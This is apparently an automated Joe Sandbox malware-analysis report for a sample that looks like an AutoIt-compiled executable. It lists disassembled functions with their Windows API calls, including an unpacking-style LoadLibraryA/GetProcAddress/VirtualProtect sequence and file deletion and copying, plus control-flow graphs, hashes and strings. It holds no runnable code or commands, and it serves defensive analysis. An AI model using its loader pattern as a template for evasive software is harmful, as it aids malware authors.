                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 707f21d765b191d2f2aca21112ccce6fceb8f418f0dd44265b8be0de107a6006
                                          • Instruction ID: 3d53e8d56d0a1ebddb6fcaa2b3ec1ddd4df3f013b9c9e5f41e9b9a342ec453bb
                                          • Opcode Fuzzy Hash: 707f21d765b191d2f2aca21112ccce6fceb8f418f0dd44265b8be0de107a6006
                                          • Instruction Fuzzy Hash: 6E115AB5200700BFD7258B66EC58F677BB9EBC9B12F248569F406A62A0DB61E8048671
                                          Function 00DDFE40 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1040COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: %
                                          • API String ID: 3964851224-2291192146
                                          • Opcode ID: 2644d0862f319c6b04e1b8814a901d7eb224f192f873e160ed18438d27622ce6
                                          • Instruction ID: a291813ce8783ca1422b832f793b694642e53a4740aa00b97a928adeb204253a
                                          • Opcode Fuzzy Hash: 2644d0862f319c6b04e1b8814a901d7eb224f192f873e160ed18438d27622ce6
                                          • Instruction Fuzzy Hash: F2925C746083819FD724EF15C480B6ABBE1FF88304F14996DE98A9B351D771EC85CBA2
                                          Function 00EE8070 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1463 ee8070-ee807d 1464 ee808a-ee808f 1463->1464 1465 ee8091 1464->1465 1466 ee8093 1465->1466 1467 ee8080-ee8085 1465->1467 1469 ee8098-ee809a 1466->1469 1468 ee8086-ee8088 1467->1468 1468->1464 1468->1465 1470 ee809c-ee80a1 1469->1470 1471 ee80a3-ee80a7 1469->1471 1470->1471 1472 ee80a9 1471->1472 1473 ee80b4-ee80b7 1471->1473 1474 ee80ab-ee80b2 1472->1474 1475 ee80d3-ee80d8 1472->1475 1476 ee80b9-ee80be 1473->1476 1477 ee80c0-ee80c2 1473->1477 1474->1473 1474->1475 1478 ee80da-ee80e3 1475->1478 1479 ee80eb-ee80ed 1475->1479 1476->1477 1477->1469 1480 ee815a-ee815d 1478->1480 1481 ee80e5-ee80e9 1478->1481 1482 ee80ef-ee80f4 1479->1482 1483 ee80f6 1479->1483 1484 ee8162-ee8165 1480->1484 1481->1483 1482->1483 1485 ee80f8-ee80fb 1483->1485 1486 ee80c4-ee80c6 1483->1486 1489 ee8167-ee8169 1484->1489 1490 ee80fd-ee8102 1485->1490 1491 ee8104 1485->1491 1487 ee80cf-ee80d1 1486->1487 1488 ee80c8-ee80cd 1486->1488 1492 ee8125-ee8134 1487->1492 1488->1487 1489->1484 1493 ee816b-ee816e 1489->1493 1490->1491 1491->1486 1494 ee8106-ee8108 1491->1494 1495 ee8136-ee813d 1492->1495 1496 ee8144-ee8151 1492->1496 1493->1484 1497 ee8170-ee818c 1493->1497 1498 ee810a-ee810f 1494->1498 1499 ee8111-ee8115 1494->1499 1495->1495 1500 ee813f 1495->1500 1496->1496 1501 ee8153-ee8155 1496->1501 1497->1489 1502 ee818e 1497->1502 1498->1499 1499->1494 1503 ee8117 1499->1503 1500->1468 1501->1468 1504 ee8194-ee8198 1502->1504 1505 ee8119-ee8120 1503->1505 1506 ee8122 1503->1506 1507 ee81df-ee81e2 1504->1507 1508 ee819a-ee81b0 LoadLibraryA 1504->1508 1505->1494 1505->1506 1506->1492 1509 ee81e5-ee81ec 1507->1509 1510 ee81b1-ee81b6 1508->1510 1511 ee81ee-ee81f0 1509->1511 1512 ee8210-ee8240 VirtualProtect * 2 1509->1512 1510->1504 1513 ee81b8-ee81ba 1510->1513 1516 ee81f2-ee8201 1511->1516 1517 ee8203-ee820e 1511->1517 1518 ee8244-ee8248 1512->1518 1514 ee81bc-ee81c2 1513->1514 1515 ee81c3-ee81d0 GetProcAddress 1513->1515 1514->1515 1519 ee81d9 ExitProcess 1515->1519 1520 ee81d2-ee81d7 1515->1520 1516->1509 1517->1516 1518->1518 1521 ee824a 1518->1521 1520->1510
                                          APIs
                                          • LoadLibraryA.KERNEL32(?), ref: 00EE81AA
                                          • GetProcAddress.KERNEL32(?,00EE1FF9), ref: 00EE81C8
                                          • ExitProcess.KERNEL32(?,00EE1FF9), ref: 00EE81D9
                                          • VirtualProtect.KERNELBASE(00DD0000,00001000,00000004,?,00000000), ref: 00EE8227
                                          • VirtualProtect.KERNELBASE(00DD0000,00001000), ref: 00EE823C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                          • String ID:
                                          • API String ID: 1996367037-0
                                          • Opcode ID: 48ca31c62502f77867b20b1747144f665381bcfee6d7042a2bb717c4e4c30c01
                                          • Instruction ID: fc0599e8b11ab9c6833516a41d7b38f30b5a8879243d7a2722c53499d466b0f9
                                          • Opcode Fuzzy Hash: 48ca31c62502f77867b20b1747144f665381bcfee6d7042a2bb717c4e4c30c01
                                          • Instruction Fuzzy Hash: 09513E72A457DA4FD7208E79DEC06A1B794EB4132471C1738D5E9EB3C5EFA05C0A8760
                                          Function 00E34696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00E0E7C1), ref: 00E346A6
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00E346B7
                                          • FindClose.KERNEL32(00000000), ref: 00E346C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: 2f643e0895660d612839bbb9de8447d2f46aa15680645fd038575b8bec757ae2
                                          • Instruction ID: 71d0894c0f0b50b05e88419f2216d09950e81ade82a65d559adbf03cda03dc7e
                                          • Opcode Fuzzy Hash: 2f643e0895660d612839bbb9de8447d2f46aa15680645fd038575b8bec757ae2
                                          • Instruction Fuzzy Hash: 11E0D8754105005F52147B38EC4E8EA7B9C9F07336F100B15F935E20F0E7B06D54C596
                                          Function 00DDE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                          Download Yara Rule
                                          Strings
                                          • Variable must be of type 'Object'., xrefs: 00E1428C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable must be of type 'Object'.
                                          • API String ID: 0-109567571
                                          • Opcode ID: 9b65502c02486904fdb5405b08c92226ce33684562aa5290625c73ff8a12988c
                                          • Instruction ID: d4339a634d55aec1e6dad8f14a930237fd8445c6fe8d3d3768e080aa05cb7b66
                                          • Opcode Fuzzy Hash: 9b65502c02486904fdb5405b08c92226ce33684562aa5290625c73ff8a12988c
                                          • Instruction Fuzzy Hash: 9BA25D75A04215CFCB24DF58C880AADB7B1FF48304F69806BE956AB351D731ED86CBA1
                                          Function 00DE0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE0BBB
                                          • timeGetTime.WINMM ref: 00DE0E76
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE0FB3
                                          • TranslateMessage.USER32(?), ref: 00DE0FC7
                                          • DispatchMessageW.USER32(?), ref: 00DE0FD5
                                          • Sleep.KERNEL32(0000000A), ref: 00DE0FDF
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00DE105A
                                          • DestroyWindow.USER32 ref: 00DE1066
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DE1080
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00E152AD
                                          • TranslateMessage.USER32(?), ref: 00E1608A
                                          • DispatchMessageW.USER32(?), ref: 00E16098
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E160AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                          • API String ID: 4003667617-3242690629
                                          • Opcode ID: 00acb077dd7fb0395df794b8e6c3f3651487cfa35a9ca60b06c1bb6b7efd4c56
                                          • Instruction ID: 41f5ce3f7c498793788a88e67f23b0592dccf9d09df993334d226ec244cf0d20
                                          • Opcode Fuzzy Hash: 00acb077dd7fb0395df794b8e6c3f3651487cfa35a9ca60b06c1bb6b7efd4c56
                                          • Instruction Fuzzy Hash: 4DB2D771608741DFD728DF25C884BAABBE5FF84304F14491EF49AA7291D771E884CBA2
                                          Function 00E393DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E391E9: __time64.LIBCMT ref: 00E391F3
                                            • Part of subcall function 00DD5045: _fseek.LIBCMT ref: 00DD505D
                                          • __wsplitpath.LIBCMT ref: 00E394BE
                                            • Part of subcall function 00DF432E: __wsplitpath_helper.LIBCMT ref: 00DF436E
                                          • _wcscpy.LIBCMT ref: 00E394D1
                                          • _wcscat.LIBCMT ref: 00E394E4
                                          • __wsplitpath.LIBCMT ref: 00E39509
                                          • _wcscat.LIBCMT ref: 00E3951F
                                          • _wcscat.LIBCMT ref: 00E39532
                                            • Part of subcall function 00E3922F: _memmove.LIBCMT ref: 00E39268
                                            • Part of subcall function 00E3922F: _memmove.LIBCMT ref: 00E39277
                                          • _wcscmp.LIBCMT ref: 00E39479
                                            • Part of subcall function 00E399BE: _wcscmp.LIBCMT ref: 00E39AAE
                                            • Part of subcall function 00E399BE: _wcscmp.LIBCMT ref: 00E39AC1
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E396DC
                                          • _wcsncpy.LIBCMT ref: 00E3974F
                                          • DeleteFileW.KERNEL32(?,?), ref: 00E39785
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E3979B
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E397AC
                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E397BE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: eeba44f95c80639e576b43028a4dd6c46dcef01d49eb22f9032f07bb6914add4
                                          • Instruction ID: 95b158bc002f35c66cf8c1a3ad869a04e6d3e9e8a587578ae884cfb4fa863eac
                                          • Opcode Fuzzy Hash: eeba44f95c80639e576b43028a4dd6c46dcef01d49eb22f9032f07bb6914add4
                                          • Instruction Fuzzy Hash: 32C10BB1D00219AADF11DF95DC85AEEBBBDEF55300F0040AAF609F6252DB709A84CF65
                                          Function 00DD71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00DD4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E962F8,?,00DD37C0,?), ref: 00DD4882
                                            • Part of subcall function 00DF074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00DD72C5), ref: 00DF0771
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DD7308
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E0ECF1
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E0ED32
                                          • RegCloseKey.ADVAPI32(?), ref: 00E0ED70
                                          • _wcscat.LIBCMT ref: 00E0EDC9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: a1f38cdb16fd6c6957b88bb23ef9538d969f44c608e9800d2c7b92b24140d227
                                          • Instruction ID: d049c8d7de081105a7a990e6a0824cc37308eaab21fc36cf95b273ebb8b56ad1
                                          • Opcode Fuzzy Hash: a1f38cdb16fd6c6957b88bb23ef9538d969f44c608e9800d2c7b92b24140d227
                                          • Instruction Fuzzy Hash: 0D713CB15283059EC314DF66EC819ABBBE8FF94340B44596FF585A32B1EB30994CCB61
                                          Function 00DD3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DD3A62
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00DD3A71
                                          • LoadIconW.USER32(00000063), ref: 00DD3A88
                                          • LoadIconW.USER32(000000A4), ref: 00DD3A9A
                                          • LoadIconW.USER32(000000A2), ref: 00DD3AAC
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DD3AD2
                                          • RegisterClassExW.USER32(?), ref: 00DD3B28
                                            • Part of subcall function 00DD3041: GetSysColorBrush.USER32(0000000F), ref: 00DD3074
                                            • Part of subcall function 00DD3041: RegisterClassExW.USER32(00000030), ref: 00DD309E
                                            • Part of subcall function 00DD3041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DD30AF
                                            • Part of subcall function 00DD3041: LoadIconW.USER32(000000A9), ref: 00DD30F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 2880975755-4155596026
                                          • Opcode ID: 286f0c84c5e1d4dd0c335ce31ee5079dec8cd46f6a9e824b2ca10a20976de54b
                                          • Instruction ID: b5a19b9eedb938f741de2bf1b396cf47e69306e0aae21d26954cb58f4113d501
                                          • Opcode Fuzzy Hash: 286f0c84c5e1d4dd0c335ce31ee5079dec8cd46f6a9e824b2ca10a20976de54b
                                          • Instruction Fuzzy Hash: AF214870A10308AFEB109FA6EC09B9D7BB4FB08711F00016BF504BA2B0D3BA56588F94
                                          Function 00DD3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                          • API String ID: 1825951767-3513169116
                                          • Opcode ID: c38569aa55d05b8a2a94a92bf61df7c54dd6c3fc917d605984b0e81e7dbc8ea1
                                          • Instruction ID: 425eb3855d93e325ea38cdae21a007804c4dfef7fa92169cbf2fbd4c80e67319
                                          • Opcode Fuzzy Hash: c38569aa55d05b8a2a94a92bf61df7c54dd6c3fc917d605984b0e81e7dbc8ea1
                                          • Instruction Fuzzy Hash: 92A13D719102299ACB15EBE0CC91EEEB778FF14300F44052BF412B7291EB759A09CB71
                                          Function 00DD3015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73registrywindowclipboardCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DD3074
                                          • RegisterClassExW.USER32(00000030), ref: 00DD309E
                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DD30AF
                                          • LoadIconW.USER32(000000A9), ref: 00DD30F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 975902462-1005189915
                                          • Opcode ID: 66181aa056ec8632819035e6485dc188b9fafffee40eb3363f8976661399c3be
                                          • Instruction ID: 2a4b990a77052a22ecdd4a2589126d8ecc18e95f049d7dec166bd2c85251f55c
                                          • Opcode Fuzzy Hash: 66181aa056ec8632819035e6485dc188b9fafffee40eb3363f8976661399c3be
                                          • Instruction Fuzzy Hash: 403134B1805309AFDB10CFA5E889ADDBBF4FB09311F14496BE590F62A0D7B50549CF91
                                          Function 00DD3041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DD3074
                                          • RegisterClassExW.USER32(00000030), ref: 00DD309E
                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DD30AF
                                          • LoadIconW.USER32(000000A9), ref: 00DD30F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 975902462-1005189915
                                          • Opcode ID: 3347bd03e401fb390d35161aaee9fe0f6bb2ea8f5af9868393402d6247c6e5f6
                                          • Instruction ID: 6c09e7f69575dfd8484e234c0166d07ffc97f6e9d17012c6f38c0a14696b3bf4
                                          • Opcode Fuzzy Hash: 3347bd03e401fb390d35161aaee9fe0f6bb2ea8f5af9868393402d6247c6e5f6
